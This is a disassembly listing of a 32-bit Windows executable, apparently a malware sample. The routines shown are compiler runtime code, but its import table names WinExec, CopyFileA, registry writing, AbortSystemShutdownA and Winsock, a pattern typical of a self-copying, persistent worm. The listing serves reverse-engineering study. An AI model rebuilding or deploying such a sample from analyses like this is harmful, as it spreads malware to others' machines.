loc_4046DB: ; CODE XREF: sub_404600+AD�j
xor edx, edx
mov [edi], edx
loc_4046DF: ; CODE XREF: sub_404600+C5�j
; sub_404600+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4046F1
loc_4046E7: ; CODE XREF: sub_404600+79�j
xor eax, eax
loc_4046E9: ; CODE XREF: sub_404600+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4046E9
loc_4046F1: ; CODE XREF: sub_404600+E5�j
and ebx, 3
jnz short loc_40467B
loc_4046F6: ; CODE XREF: sub_404600+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_404600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046FE proc near ; CODE XREF: sub_403AE6+BE�p
; sub_403AE6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405470
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4070DC, edi
jnz short loc_404774
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405424
mov esi, 100h
push esi
push edi
call dword_405098 ; LCMapStringW
test eax, eax
jz short loc_404752
mov dword_4070DC, ebx
jmp short loc_404774
; ---------------------------------------------------------------------------
loc_404752: ; CODE XREF: sub_4046FE+4A�j
push edi
push edi
push ebx
push offset dword_406F38
push esi
push edi
call dword_40509C ; LCMapStringA
test eax, eax
jz loc_40488C
mov dword_4070DC, 2
loc_404774: ; CODE XREF: sub_4046FE+2E�j
; sub_4046FE+52�j
cmp [ebp+arg_C], edi
jle short loc_404789
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404922
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404789: ; CODE XREF: sub_4046FE+79�j
mov eax, dword_4070DC
cmp eax, 2
jnz short loc_4047B0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringA
jmp loc_40488E
; ---------------------------------------------------------------------------
loc_4047B0: ; CODE XREF: sub_4046FE+93�j
cmp eax, 1
jnz loc_40488C
cmp [ebp+arg_18], edi
jnz short loc_4047C6
mov eax, dword_4070D4
mov [ebp+arg_18], eax
loc_4047C6: ; CODE XREF: sub_4046FE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40488C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404821
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404821: ; CODE XREF: sub_4046FE+10E�j
cmp [ebp+var_24], edi
jz short loc_40488C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
test eax, eax
jz short loc_40488C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_405098 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40488C
test byte ptr [ebp+arg_4+1], 4
jz short loc_4048A0
cmp [ebp+arg_14], edi
jz loc_40491B
cmp esi, [ebp+arg_14]
jg short loc_40488C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_405098 ; LCMapStringW
test eax, eax
jnz loc_40491B
loc_40488C: ; CODE XREF: sub_4046FE+66�j
; sub_4046FE+B5�j ...
xor eax, eax
loc_40488E: ; CODE XREF: sub_4046FE+AD�j
; sub_4046FE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4046FE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048D4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4048D4: ; CODE XREF: sub_4046FE+1C2�j
cmp ebx, edi
jz short loc_40488C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_405098 ; LCMapStringW
test eax, eax
jz short loc_40488C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4048FB
push edi
push edi
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4046FE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_404901: ; CODE XREF: sub_4046FE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4050C8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40488C
loc_40491B: ; CODE XREF: sub_4046FE+165�j
; sub_4046FE+188�j
mov eax, esi
jmp loc_40488E
sub_4046FE endp
; =============== S U B R O U T I N E =======================================
sub_404922 proc near ; CODE XREF: sub_4046FE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40493F
loc_404932: ; CODE XREF: sub_404922+1B�j
cmp byte ptr [eax], 0
jz short loc_40493F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404932
loc_40493F: ; CODE XREF: sub_404922+E�j
; sub_404922+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40494A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40494A: ; CODE XREF: sub_404922+21�j
mov eax, edx
retn
sub_404922 endp
; =============== S U B R O U T I N E =======================================
sub_40494D proc near ; CODE XREF: sub_403CC8+1F�p
arg_0 = dword ptr 4
mov eax, dword_4070E4
test eax, eax
jz short loc_404965
push [esp+arg_0]
call eax ; dword_4070E4
test eax, eax
pop ecx
jz short loc_404965
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_40494D+7�j
; sub_40494D+12�j
xor eax, eax
retn
sub_40494D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_403D93+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404990
cmp edi, eax
jb loc_404B08
loc_404990: ; CODE XREF: sub_404970+16�j
test edi, 3
jnz short loc_4049AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
loc_4049AC: ; CODE XREF: sub_404970+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4049C4
and eax, 3
add ecx, eax
jmp dword ptr loc_4049CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4049C4: ; CODE XREF: sub_404970+46�j
jmp dword ptr loc_404AC8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4049CC: ; CODE XREF: sub_404970+31�j
; sub_404970+8E�j ...
jmp off_404A4C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4049E0
dd offset loc_404A0C
dd offset loc_404A30
; ---------------------------------------------------------------------------
loc_4049E0: ; DATA XREF: sub_404970+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A0C: ; DATA XREF: sub_404970+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404A30: ; DATA XREF: sub_404970+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404A4C dd offset loc_404AAF ; DATA XREF: sub_404970:loc_4049CC�r
dd offset loc_404A9C
dd offset loc_404A94
dd offset loc_404A8C
dd offset loc_404A84
dd offset loc_404A7C
dd offset loc_404A74
dd offset loc_404A6C
; ---------------------------------------------------------------------------
loc_404A6C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404A74: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404A7C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404A84: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404A8C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404A94: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404A9C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404AAF: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970:off_404A4C�o
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AB8 dd offset loc_404AC8 ; DATA XREF: sub_404970+35�r
; sub_404970+92�r ...
dd offset loc_404AD0
dd offset loc_404ADC
dd offset loc_404AF0
; ---------------------------------------------------------------------------
loc_404AC8: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404ADC: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AF0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B08: ; CODE XREF: sub_404970+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404B3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B30: ; CODE XREF: sub_404970+1B1�j
; sub_404970+208�j ...
neg ecx
jmp off_404C00[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B3C: ; CODE XREF: sub_404970+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404B54
and eax, 3
sub ecx, eax
jmp dword ptr loc_404B54+4[eax*4]
; ---------------------------------------------------------------------------
loc_404B54: ; CODE XREF: sub_404970+1D6�j
; DATA XREF: sub_404970+1DD�r
jmp off_404C50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404B67+1
dd offset loc_404B88
; ---------------------------------------------------------------------------
mov al, 4Bh
inc eax
loc_404B67: ; DATA XREF: sub_404970+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B88: ; DATA XREF: sub_404970+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C04
dd offset loc_404C0C
dd offset loc_404C14
dd offset loc_404C1C
dd offset loc_404C24
dd offset loc_404C2C
dd offset loc_404C34
off_404C00 dd offset loc_404C47 ; DATA XREF: sub_404970+1C2�r
; ---------------------------------------------------------------------------
loc_404C04: ; DATA XREF: sub_404970+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404C0C: ; DATA XREF: sub_404970+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404C14: ; DATA XREF: sub_404970+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404C1C: ; DATA XREF: sub_404970+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404C24: ; DATA XREF: sub_404970+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404C2C: ; DATA XREF: sub_404970+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404C34: ; DATA XREF: sub_404970+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404C47: ; CODE XREF: sub_404970+1C2�j
; DATA XREF: sub_404970:off_404C00�o
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404C50 dd offset loc_404C60 ; DATA XREF: sub_404970+1B7�r
; sub_404970:loc_404B54�r ...
dd offset loc_404C68
dd offset loc_404C78
dd offset loc_404C8C
; ---------------------------------------------------------------------------
loc_404C60: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C68: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C8C: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404970 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404CA6 proc near ; CODE XREF: sub_4033C0+13�p
jmp dword_405080
sub_404CA6 endp
; ---------------------------------------------------------------------------
dd 0D5h dup(0)
dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B08+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401EF0+F8�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_402029:loc_402095�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404478+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403D2A+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403AE6+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_40371C+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_40371C+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40371C+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403D93+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_4031D7+166�r
dword_405098 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_4046FE+14D�r ...
dword_40509C dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_4046FE+A7�r
dword_4050A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050A4 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_4031D7+59�r
dword_4050A8 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050AC dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050B0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402B10+91�r
dword_4050B4 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050B8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4046FE+20D�r
dword_4050CC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_4030A5+E1�r
dword_4050D0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050D4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050D8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_4035C9+143�r
align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 0 dword_4050EC dd 0 ; sub_40159E+2DD�r ...
dword_4050F0 dd 0 ; sub_401398+151�r ...
dword_4050F4 dd 0 ; sub_40127D+27�r ...
dword_4050F8 dd 0 ; sub_40127D+51�r ...
dword_4050FC dd 0 ; sub_40127D+6C�r ...
dword_405100 dd 0 dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 ; sub_4011D5+7�r ...
dword_405110 dd 0 ; sub_4011D5+1E�r ...
dword_405114 dd 0 dword_405118 dd 0 dword_40511C dd 0 ; sub_40127D+10F�r ...
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h
; DATA XREF: .text:00402843�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4035C9+119�o
align 4
asc_4053E8 db 0Ah ; DATA XREF: sub_4035C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4035C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4035C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4035C9+7D�o
align 4
dword_405424 dd 0 ; sub_4046FE+36�o
dword_405428 dd 0FFFFFFFFh, 403815h, 403819haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404573+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404573+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404573+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404573+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: sub_4046FE+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 572Eh, 5766h, 5754h, 5746h, 0
dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C80CCA8h, 7C838DE8h
dd 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh
dd 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 7C814AE7h
dd 7C80A0D4h, 7C81CF5Bh, 7C812F08h, 7C80CC97h, 7C812F39h
dd 0
dd 7E41A8ADh, 0
dd 80000001h, 80000010h, 80000013h, 80000009h, 80000017h
dd 80000004h, 8000000Dh, 80000039h, 8000000Ch, 8000000Bh
dd 80000034h, 80000073h, 80000002h, 80000003h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
